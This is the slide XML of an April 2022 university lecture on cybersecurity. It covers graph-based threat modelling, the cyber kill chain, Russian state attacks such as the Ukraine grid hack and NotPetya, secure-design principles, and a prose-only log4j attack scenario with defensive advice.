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7" r:id="rId27"/>
    <p:sldId id="309" r:id="rId28"/>
    <p:sldId id="310" r:id="rId29"/>
    <p:sldId id="31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3"/>
    <p:restoredTop sz="71926"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="2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9A39-7531-CE44-9EA9-76253CC34587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152DC-FD03-FF43-AF76-CC85CAD5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7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Graphs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> can further convey information by changing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> colors or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>edge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> thicknesses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>We use graphs all the time to model complex situations like security scenarios, both physical and cyber.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>Briefly discuss PACRAT patent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www.lockheedmartin.com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-us/capabilities/cyber/cyber-kill-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chain.html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0" indent="0" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most people think the hack ends at step #4.  That’s actually where it begins!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 of 73 MW hours of electricity over one to six hours.</a:t>
            </a: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Ukraine_power_grid_hack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Petya and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NotPetya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ransomware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> WannaCry  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> (NSA)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Sandworm (again)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Discuss the dangers of vulnerabilities being misused.  (Pandora’s Box)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Source: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Petya_and_NotPetya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BERSERK BEAR (aka Energetic Bear), Russian Foreign Intelligence Service (FIS), GRU, COZY BEAR, FANCY BEAR, PRIMITIVE BEAR, VENOMOUS BEAR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20,000 CVEs reported in 2021</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Over 2,000 were considered severe (score of 9.0 to 10.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>11 critical (10.0) in Q4 of 2021, including Log4J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all best practices or “cyber hygiene”.  But can be overwhelming to small and medium sized organizations.  ~85% of U.S. critical infrastructure is privately owned (including publicly traded companies—”private” meaning “not government”.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0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subject should be given only those privileges that it needs in order to complete its task.  (Bishop 201)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Unless a subject is given explicit access to an object, it should be denied access to that object. (Bishop 202)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access control matrix, capability lists, ring-based security model.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extend to fault tolerance and resilience.  How do things behave when they break?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mechanisms should be as simple as possible. (Bishop 202)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complexity is the enemy of security!  KISS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From martial arts: no wasted movements.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9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Doctrine (Cyber, then physical; escalation?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ukraine power grid attack (2015) associated with invasion of Crimea (2014)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sandworm, Voodoo Bear, Fancy Bear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6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accesses to objects should be checked to ensure they are allowed. (Bishop 203)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider an n-tier application where business rules are enforced by the application, but a user has direct access to the data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7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security of a mechanism should depend on the secrecy of its design or implementation. (Bishop 204)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The effectiveness of cryptography doesn’t depend on the algorithm, but the privacy of the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system should not grant permission based on a single condition.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We do this with people, too!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Byzantine generals problem (Leslie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lamport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).  Difficulty of decentralized parties arriving at consensus without a single truth.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6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Mechanisms used to access resources should not be shared.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creates a covert channel.  SBX (Sand Box Escape), break confinement, escape isolation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BIG problem in the cloud, but also between processes.  Hardware vendors squeeze performance at the expense of security.  (e.g., PIDs)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5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mechanisms should not make the resource more difficult to access than if the security mechanisms were not present.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We break this one so often its commonly accepted that security and usability are inversely related.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider email access and complex passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Briefly describe Computing Conference papers.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Application authenticating users with log4j embedded.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1. Charlie Brown is an authenticated and authorized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A2A-51FC-214B-B910-AF60101058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4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Linus Van Pelt is an authenticated and authorized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A2A-51FC-214B-B910-AF60101058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0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Malicious hacker is not authenticated or authorized.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A2A-51FC-214B-B910-AF60101058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22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By changing his username to a string that exploits log4j, malicious hacker attempts to log into the system (and is denied), but the username is interpreted by log4j and results in a downloading and executing malware on the system that creates a backdoor for the hacker.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A2A-51FC-214B-B910-AF60101058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53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 This time the hacker is an authorized and authenticated user, due to the log4j exploit in the previous slide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WRAP UP / Q&amp;A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CMU’s SEI top 10 secure coding principles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CWEs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resilience design (zero trust architecture, assume compromise, ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>mission availability)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A2A-51FC-214B-B910-AF60101058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Different non-classified threat intelligence vendors make up their own names for the same groups.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www.crowdstrike.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/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www.mandiant.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/resources/apt-groups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nation typically has a common moniker (e.g., BEAR for Russia), but not always!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And of course each threat intelligence vendor has their own naming scheme (APT 28 v. Fancy Bear; same group!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fancy bear, voodoo bear, cozy bear, energetic bear…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We do this, too (NSA’s TAO)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Intel’s ”Threat Agent Library” (2007)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Q: Why do we care?  Don’t you just protect your system as best as you can?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A: No! (Due to limited resources and varied capabilities of the different threats you may face.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Previous wisdom was that government cyberwarriors are probably going to “get in”.  Russia v. Ukraine (2022 changed that!)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graph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> is a formal mathematical definition of things and their relationships.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Nodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> are things (people, places, processes, etc.). (Sometimes called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>vertices.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>). Hence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>G=(V, E)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>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3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Edges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> show relationships between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>nodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty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Edges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> can be unidirectional, bidirectional, or have no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Edges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> can be decorated with additional information or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> about the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152DC-FD03-FF43-AF76-CC85CAD5E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3FA9-A2F6-834F-B8D9-C582FC6D0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 the rabbit hole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B1A44-C9F5-B84C-A9CB-2D410548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071774"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>William Hutton, PhD, CISSP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Washington State University</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>April 26, 2022</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132243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6C14-CC6E-864F-B536-7872F6A8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Graph Theory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62AED6-6916-8243-9802-A1D0C59AAA16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330232" y="2690948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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="-25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A7CE85-5419-A14B-8EB4-D44CBAF53264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775164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  <a:endParaRPr lang="en-US" baseline="-25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0042FE-00CB-4B45-AF37-072EE1448B78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="364671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Avery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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1B5D-AA5B-6A49-B39F-BC8E6482BBE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470263" y="5303516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Ewan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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115EC9-095B-A24F-9CEE-76646995C905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6220096" y="3344090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Henry</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2C73-8A20-914E-915C-CA525C74C669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860842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Emma</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="-25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329B9-83EA-C147-B035-408289FA0F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9261566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Corby</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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523C8-C12B-504F-B747-5895EB7F097B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2636517" y="2943497"/>
            <a:ext cx="1138647" cy="400594"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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B0672-5015-0D4A-9F22-E8F6631E6154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123406" y="3805932"/>
            <a:ext cx="398127" cy="1497584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CDAE42-E95B-5445-AE31-5F0E8046A5E8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2445216" y="3805932"/>
            <a:ext cx="1392798" cy="1035742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81E728-098D-D447-8DAE-2F8AB0D778A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4299856" y="3596639"/>
            <a:ext cx="128451" cy="1053734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8A5DAD-08CA-7046-87C9-D430D1F35D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="6" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4952998" y="5303516"/>
            <a:ext cx="3655425" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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5C5AFC-3527-1143-BB58-19EDA6B1EE2E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7526381" y="2943497"/>
            <a:ext cx="1735185" cy="1053736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1B42C3-51AC-7E41-8D7C-4A340174C7E9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9261566" y="3596639"/>
            <a:ext cx="653143" cy="1053734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E7B7A9-9F35-4245-981E-9D540BBCE522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868391" y="42810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47C15-632D-2545-BCC5-C559EE4D1678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3043452" y="261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6F051-072D-A148-AE61-EA11CF1FE51E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3062963" y="38460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27356-BC68-0640-908D-F83C8D149CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419730" y="39117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1FF18-4696-0842-B76B-9F783E3410C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6548910" y="4849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4FC58A-49A5-A14B-AFB4-C349BB727A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7955281" y="29940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FA2BF-7909-FE49-89AF-8FB3CAA4A65D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9161717" y="38460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83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6C14-CC6E-864F-B536-7872F6A8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Graph Theory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62AED6-6916-8243-9802-A1D0C59AAA16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330232" y="2690948"/>
            <a:ext cx="1306285" cy="13062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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="-25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A7CE85-5419-A14B-8EB4-D44CBAF53264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775164" y="2290354"/>
            <a:ext cx="1306285" cy="1306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  <a:endParaRPr lang="en-US" baseline="-25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0042FE-00CB-4B45-AF37-072EE1448B78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3646713" y="4650373"/>
            <a:ext cx="1306285" cy="13062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Avery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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1B5D-AA5B-6A49-B39F-BC8E6482BBE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470263" y="5303516"/>
            <a:ext cx="1306285" cy="13062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Ewan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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115EC9-095B-A24F-9CEE-76646995C905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6220096" y="3344090"/>
            <a:ext cx="1306285" cy="13062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Henry</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2C73-8A20-914E-915C-CA525C74C669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8608423" y="4650373"/>
            <a:ext cx="1306285" cy="130628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Emma</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="-25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329B9-83EA-C147-B035-408289FA0F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9261566" y="2290354"/>
            <a:ext cx="1306285" cy="130628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Corby</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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523C8-C12B-504F-B747-5895EB7F097B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2636517" y="2943497"/>
            <a:ext cx="1138647" cy="400594"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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B0672-5015-0D4A-9F22-E8F6631E6154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123406" y="3805932"/>
            <a:ext cx="398127" cy="1497584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CDAE42-E95B-5445-AE31-5F0E8046A5E8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2445216" y="3805932"/>
            <a:ext cx="1392798" cy="1035742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81E728-098D-D447-8DAE-2F8AB0D778A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4299856" y="3596639"/>
            <a:ext cx="128451" cy="1053734"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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8A5DAD-08CA-7046-87C9-D430D1F35D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="6" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4952998" y="5303516"/>
            <a:ext cx="3655425" cy="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5C5AFC-3527-1143-BB58-19EDA6B1EE2E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7526381" y="2943497"/>
            <a:ext cx="1735185" cy="1053736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1B42C3-51AC-7E41-8D7C-4A340174C7E9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9261566" y="3596639"/>
            <a:ext cx="653143" cy="1053734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E7B7A9-9F35-4245-981E-9D540BBCE522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868391" y="42810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47C15-632D-2545-BCC5-C559EE4D1678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3043452" y="26115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6F051-072D-A148-AE61-EA11CF1FE51E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3062963" y="38460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27356-BC68-0640-908D-F83C8D149CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419730" y="39117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1FF18-4696-0842-B76B-9F783E3410C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6548910" y="4849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4FC58A-49A5-A14B-AFB4-C349BB727A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7955281" y="29940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FA2BF-7909-FE49-89AF-8FB3CAA4A65D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9161717" y="38460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552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E457-5E27-8241-A7EF-1A98537A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Cyber Kill Chain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8856B-F7F8-034E-841E-A538FEACA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9947" y="2193925"/>
            <a:ext cx="3452105" cy="4024313"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257017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9915-E5A9-B542-BB6C-166D8F22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Ukraine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8E3F-7B32-F043-ADDB-E9BDA9FE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Spear phishing w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BlackEnergy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> malware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control of SCADA systems (pivot)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Remotely disconnect substations (distribution)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Loss of integrity on servers and workstations with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>KillDisk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> malware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Loss of availability at utility call centers exacerbates outage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351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48D6-6A0B-594B-8B7A-26673B8C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(2017)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4A380-452D-EF41-ACFA-BC8C82362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4118" y="2193925"/>
            <a:ext cx="7243763" cy="4024313"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302623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CD76-8373-014C-B12A-A3C7E36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6E6FA-1028-7349-BD35-3928144D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CISA, FBI, NSA release CSA on Russian cyber threats to U.S. critical infrastructure (1/11/2022)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CISA, FBI, NSA ”Russian State-Sponsored Actors Target Cleared Defense Contractor Networks” (2/16/2022)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NCSC-NZ release advisory on cyber threats related to Russia-Ukraine tension (2/18/2022)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CISA and FBI release CSA, “Russian State-Sponsored Cyber Actors Access Network Misconfigured with Default MFA Protocols” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrintNightmare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, CVE 2021-34527)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Five Eyes CSA, “Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure” (AA22-110A)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4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0F51-7846-E242-987D-7A810D78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Vulnerabilities and Exposures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7D3E1-E7F3-7145-A219-77BD90C5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84" y="0"/>
            <a:ext cx="983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2C65-5345-6444-AE95-2F8E60F5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DFDD-9E7C-8948-83CB-712E7815C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Update software, including OS, applications, and firmware!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enforce MFA and strong passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure RDP and monitor it (and other risky services) closely [IOCs]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>End-user awareness and training</a:t>
            </a:r>
          </a:p>
          <a:p>
